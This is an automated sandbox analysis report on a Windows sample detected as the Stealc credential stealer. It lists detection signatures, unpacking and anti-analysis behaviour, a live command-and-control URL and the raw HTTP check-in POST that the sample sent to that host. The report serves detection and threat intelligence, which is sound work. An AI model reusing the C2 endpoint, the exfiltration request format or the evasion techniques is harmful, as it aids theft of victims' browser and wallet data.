Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
XDPT5mgIBO.exe

Overview

General Information

Sample name:XDPT5mgIBO.exe
renamed because original name is a hash value
Original sample name:6764f657774334189cbecc80dbb3c855.exe
Analysis ID:1527619
MD5:6764f657774334189cbecc80dbb3c855
SHA1:9f597f7e92400f0c83f6166d1ec4a9228b3c5514
SHA256:ef31a45fb90a7cae12898b6f16cf2c48c06d75ca03f5aaf4fc48bbbd1385be11
Tags:32exetrojan
Infos:

Detection

Stealc
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Multi AV Scanner detection for domain / URL
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse usering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

Process Tree

  • System is w10x64
  • XDPT5mgIBO.exe (PID: 5928 cmdline: "C:\Users\user\Desktop\XDPT5mgIBO.exe" MD5: 6764F657774334189CBECC80DBB3C855)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
StealcStealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, stealc is a non-resident stealer with flexible data collection settings and its development is relied on other prominent stealers: Vidar, Raccoon, Mars and Redline.Stealc is written in C and uses WinAPI functions. It mainly targets date from web browsers, extensions and Desktop application of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.stealc

Malware Configuration

Threatname: StealC

{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}

Yara Signatures

PCAP (Network Traffic)

SourceRuleDescriptionAuthorStrings
dump.pcapJoeSecurity_Stealc_1Yara detected StealcJoe Security

    Memory Dumps

    SourceRuleDescriptionAuthorStrings
    00000000.00000002.2188755013.00000000013BE000.00000004.00000020.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
      00000000.00000003.2147803370.0000000005010000.00000004.00001000.00020000.00000000.sdmpJoeSecurity_StealcYara detected StealcJoe Security
        00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmpJoeSecurity_StealcYara detected StealcJoe Security
          Process Memory Space: XDPT5mgIBO.exe PID: 5928JoeSecurity_PowershellDownloadAndExecuteYara detected Powershell download and executeJoe Security
            Process Memory Space: XDPT5mgIBO.exe PID: 5928JoeSecurity_StealcYara detected StealcJoe Security

              Unpacked PEs

              SourceRuleDescriptionAuthorStrings
              0.2.XDPT5mgIBO.exe.640000.0.unpackJoeSecurity_StealcYara detected StealcJoe Security

                Sigma Signatures

                No Sigma rule has matched

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-10-07T06:47:05.536145+020020442431Malware Command and Control Activity Detected192.168.2.649711185.215.113.3780TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: XDPT5mgIBO.exeAvira: detected
                Antivirus detection for URL or domain
                Source: http://185.215.113.37/URL Reputation: Label: malware
                Source: http://185.215.113.37URL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Source: http://185.215.113.37/e2b1563c6670f193.phpURL Reputation: Label: malware
                Found malware configuration
                Source: 0.2.XDPT5mgIBO.exe.640000.0.unpackMalware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
                Multi AV Scanner detection for domain / URL
                Source: http://185.215.113.37/wsVirustotal: Detection: 16%Perma Link
                Multi AV Scanner detection for submitted file
                Source: XDPT5mgIBO.exeVirustotal: Detection: 53%Perma Link
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                Machine Learning detection for sample
                Source: XDPT5mgIBO.exeJoe Sandbox ML: detected
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_0064C820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat,0_2_0064C820
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_00647240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree,0_2_00647240
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_00649AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree,0_2_00649AC0
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_00649B60 CryptUnprotectData,LocalAlloc,LocalFree,0_2_00649B60
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_00658EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA,0_2_00658EA0
                Source: XDPT5mgIBO.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_006538B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose,0_2_006538B0
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_00654910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_00654910
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_0064DA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,0_2_0064DA80
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_0064E430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA,0_2_0064E430
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_00654570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen,0_2_00654570
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_0064ED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose,0_2_0064ED20
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_0064BE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose,0_2_0064BE70
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_0064DE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0064DE10
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_006416D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_006416D0
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_00653EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,0_2_00653EA0
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_0064F6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,0_2_0064F6B0

                Networking

                barindex
                Suricata IDS alerts for network traffic
                Source: Network trafficSuricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.6:49711 -> 185.215.113.37:80
                C2 URLs / IPs found in malware configuration
                Source: Malware configuration extractorURLs: http://185.215.113.37/e2b1563c6670f193.php
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: global trafficHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIJEBGDAFHIJJKEHCAAHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 49 4a 45 42 47 44 41 46 48 49 4a 4a 4b 45 48 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 31 31 32 31 33 41 45 32 44 32 39 34 32 36 36 34 39 38 37 32 31 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 4a 45 42 47 44 41 46 48 49 4a 4a 4b 45 48 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 4a 45 42 47 44 41 46 48 49 4a 4a 4b 45 48 43 41 41 2d 2d 0d 0a Data Ascii: ------EGIJEBGDAFHIJJKEHCAAContent-Disposition: form-data; name="hwid"711213AE2D294266498721------EGIJEBGDAFHIJJKEHCAAContent-Disposition: form-data; name="build"doma------EGIJEBGDAFHIJJKEHCAA--
                Source: Joe Sandbox ViewIP Address: 185.215.113.37 185.215.113.37
                Source: Joe Sandbox ViewASN Name: WHOLESALECONNECTIONSNL WHOLESALECONNECTIONSNL
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: unknownTCP traffic detected without corresponding DNS query: 185.215.113.37
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_00644880 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,lstrlen,lstrlen,HttpSendRequestA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,0_2_00644880
                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: 185.215.113.37Connection: Keep-AliveCache-Control: no-cache
                Source: unknownHTTP traffic detected: POST /e2b1563c6670f193.php HTTP/1.1Content-Type: multipart/form-data; boundary=----EGIJEBGDAFHIJJKEHCAAHost: 185.215.113.37Content-Length: 211Connection: Keep-AliveCache-Control: no-cacheData Raw: 2d 2d 2d 2d 2d 2d 45 47 49 4a 45 42 47 44 41 46 48 49 4a 4a 4b 45 48 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 37 31 31 32 31 33 41 45 32 44 32 39 34 32 36 36 34 39 38 37 32 31 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 4a 45 42 47 44 41 46 48 49 4a 4a 4b 45 48 43 41 41 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 22 0d 0a 0d 0a 64 6f 6d 61 0d 0a 2d 2d 2d 2d 2d 2d 45 47 49 4a 45 42 47 44 41 46 48 49 4a 4a 4b 45 48 43 41 41 2d 2d 0d 0a Data Ascii: ------EGIJEBGDAFHIJJKEHCAAContent-Disposition: form-data; name="hwid"711213AE2D294266498721------EGIJEBGDAFHIJJKEHCAAContent-Disposition: form-data; name="build"doma------EGIJEBGDAFHIJJKEHCAA--
                Source: XDPT5mgIBO.exe, 00000000.00000002.2188755013.00000000013BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37
                Source: XDPT5mgIBO.exe, 00000000.00000002.2188755013.0000000001419000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/
                Source: XDPT5mgIBO.exe, 00000000.00000002.2188755013.0000000001419000.00000004.00000020.00020000.00000000.sdmp, XDPT5mgIBO.exe, 00000000.00000002.2188755013.0000000001402000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
                Source: XDPT5mgIBO.exe, 00000000.00000002.2188755013.0000000001419000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php&F
                Source: XDPT5mgIBO.exe, 00000000.00000002.2188755013.0000000001419000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php.G
                Source: XDPT5mgIBO.exe, 00000000.00000002.2188755013.0000000001419000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php09
                Source: XDPT5mgIBO.exe, 00000000.00000002.2188755013.0000000001419000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpO9
                Source: XDPT5mgIBO.exe, 00000000.00000002.2188755013.0000000001419000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/e9
                Source: XDPT5mgIBO.exe, 00000000.00000002.2188755013.0000000001419000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37/ws
                Source: XDPT5mgIBO.exe, 00000000.00000002.2188755013.00000000013BE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://185.215.113.37d

                System Summary

                barindex
                PE file contains section with special chars
                Source: XDPT5mgIBO.exeStatic PE information: section name:
                Source: XDPT5mgIBO.exeStatic PE information: section name: .rsrc
                Source: XDPT5mgIBO.exeStatic PE information: section name: .idata
                Source: XDPT5mgIBO.exeStatic PE information: section name:
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_009C48880_2_009C4888
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_00A0D02A0_2_00A0D02A
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_00A120740_2_00A12074
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_008BF8700_2_008BF870
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_008DE9CC0_2_008DE9CC
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_008E09E90_2_008E09E9
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_009222A70_2_009222A7
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_00A09A410_2_00A09A41
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_00A13B860_2_00A13B86
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_00933B550_2_00933B55
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_00A10C870_2_00A10C87
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_00A064870_2_00A06487
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_009DFCFC0_2_009DFCFC
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_008EFCF60_2_008EFCF6
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_00A5545A0_2_00A5545A
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_00A155A10_2_00A155A1
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_009F6DCC0_2_009F6DCC
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_009A05FD0_2_009A05FD
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_00911E8B0_2_00911E8B
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_00AA5E2F0_2_00AA5E2F
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_00A0B6020_2_00A0B602
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_0096363F0_2_0096363F
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_009C8FCF0_2_009C8FCF
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_00A07FCF0_2_00A07FCF
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: String function: 006445C0 appears 316 times
                Source: XDPT5mgIBO.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: XDPT5mgIBO.exeStatic PE information: Section: ogawuknu ZLIB complexity 0.9949054810160024
                Source: XDPT5mgIBO.exeStatic PE information: Entrypont disasm: arithmetic instruction to all instruction ratio: 1.0 > 0.5 instr diversity: 0.5
                Source: XDPT5mgIBO.exe, 00000000.00000003.2147803370.0000000005010000.00000004.00001000.00020000.00000000.sdmp, XDPT5mgIBO.exe, 00000000.00000002.2188029200.0000000000641000.00000040.00000001.01000000.00000003.sdmpBinary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
                Source: classification engineClassification label: mal100.troj.evad.winEXE@1/0@0/1
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_00659600 CreateToolhelp32Snapshot,Process32First,Process32Next,StrCmpCA,CloseHandle,0_2_00659600
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_00653720 CoCreateInstance,MultiByteToWideChar,lstrcpyn,0_2_00653720
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\8HXJSKQQ\OD4RT2OV.htmJump to behavior
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: XDPT5mgIBO.exeVirustotal: Detection: 53%
                Source: XDPT5mgIBO.exeString found in binary or memory: 3Cannot find '%s'. Please, re-install this application
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeSection loaded: rstrtmgr.dllJump to behavior
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeSection loaded: ncrypt.dllJump to behavior
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeSection loaded: ntasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32Jump to behavior
                Source: XDPT5mgIBO.exeStatic file information: File size 1852416 > 1048576
                Source: XDPT5mgIBO.exeStatic PE information: Raw size of ogawuknu is bigger than: 0x100000 < 0x19e000

                Data Obfuscation

                barindex
                Detected unpacking (changes PE section rights)
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeUnpacked PE file: 0.2.XDPT5mgIBO.exe.640000.0.unpack :EW;.rsrc :W;.idata :W; :EW;ogawuknu:EW;hgmhlbrt:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;ogawuknu:EW;hgmhlbrt:EW;.taggant:EW;
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_00659860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,0_2_00659860
                Source: initial sampleStatic PE information: section where entry point is pointing to: .taggant
                Source: XDPT5mgIBO.exeStatic PE information: real checksum: 0x1c74d3 should be: 0x1cbc26
                Source: XDPT5mgIBO.exeStatic PE information: section name:
                Source: XDPT5mgIBO.exeStatic PE information: section name: .rsrc
                Source: XDPT5mgIBO.exeStatic PE information: section name: .idata
                Source: XDPT5mgIBO.exeStatic PE information: section name:
                Source: XDPT5mgIBO.exeStatic PE information: section name: ogawuknu
                Source: XDPT5mgIBO.exeStatic PE information: section name: hgmhlbrt
                Source: XDPT5mgIBO.exeStatic PE information: section name: .taggant
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_00B010A0 push edx; mov dword ptr [esp], ecx0_2_00B010BD
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_009C4888 push 784E2553h; mov dword ptr [esp], ebx0_2_009C4940
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_009C4888 push eax; mov dword ptr [esp], esp0_2_009C496B
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_009C4888 push ebp; mov dword ptr [esp], 29AF872Dh0_2_009C4A13
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_009C4888 push esi; mov dword ptr [esp], eax0_2_009C4A87
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_009C4888 push edx; mov dword ptr [esp], ebp0_2_009C4A8B
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_0065B035 push ecx; ret 0_2_0065B048
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_00A750FF push 1249C73Bh; mov dword ptr [esp], edx0_2_00A75123
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_00ADD028 push 3FE43887h; mov dword ptr [esp], esi0_2_00ADD031
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_00ADD028 push edx; mov dword ptr [esp], ebx0_2_00ADD03A
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_00A0D02A push 150092ECh; mov dword ptr [esp], esp0_2_00A0D049
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_00A0D02A push 3F4DC2A3h; mov dword ptr [esp], esi0_2_00A0D141
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_00A0D02A push 3D8497E0h; mov dword ptr [esp], edi0_2_00A0D16E
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_00A0D02A push 6D32BA32h; mov dword ptr [esp], ebx0_2_00A0D1A8
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_00A0D02A push ecx; mov dword ptr [esp], ebp0_2_00A0D240
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_00A0D02A push 63C14947h; mov dword ptr [esp], esi0_2_00A0D259
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_00A0D02A push 08FE84AAh; mov dword ptr [esp], ecx0_2_00A0D2B1
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_00A0D02A push 45E89993h; mov dword ptr [esp], esi0_2_00A0D314
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_00A0D02A push 15A22B5Ch; mov dword ptr [esp], edx0_2_00A0D3A7
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_00A0D02A push edi; mov dword ptr [esp], 4977C910h0_2_00A0D3EA
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_00A0D02A push eax; mov dword ptr [esp], 7EDD835Ch0_2_00A0D42E
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_00A0D02A push edx; mov dword ptr [esp], eax0_2_00A0D464
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_00A0D02A push edx; mov dword ptr [esp], eax0_2_00A0D47F
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_00A0D02A push ecx; mov dword ptr [esp], 7BF5FF9Ch0_2_00A0D483
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_00A0D02A push 66E731C2h; mov dword ptr [esp], edx0_2_00A0D4C8
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_00A0D02A push edx; mov dword ptr [esp], eax0_2_00A0D4CC
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_00A0D02A push eax; mov dword ptr [esp], esi0_2_00A0D518
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_00A0D02A push 310F477Fh; mov dword ptr [esp], esp0_2_00A0D520
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_00A0D02A push esi; mov dword ptr [esp], edx0_2_00A0D58B
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_00A0D02A push 07A77AC7h; mov dword ptr [esp], ecx0_2_00A0D65A
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeCode function: 0_2_00A0D02A push 05B64D79h; mov dword ptr [esp], edi0_2_00A0D662
                Source: XDPT5mgIBO.exeStatic PE information: section name: ogawuknu entropy: 7.953433173066681

                Boot Survival

                barindex
                Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeWindow searched: window name: FilemonClassJump to behavior
                Source: C:\Users\user\Desktop\XDPT5mgIBO.exeWindow searched: window name: PROCMON_WINDOW_CLASSJump to behavior
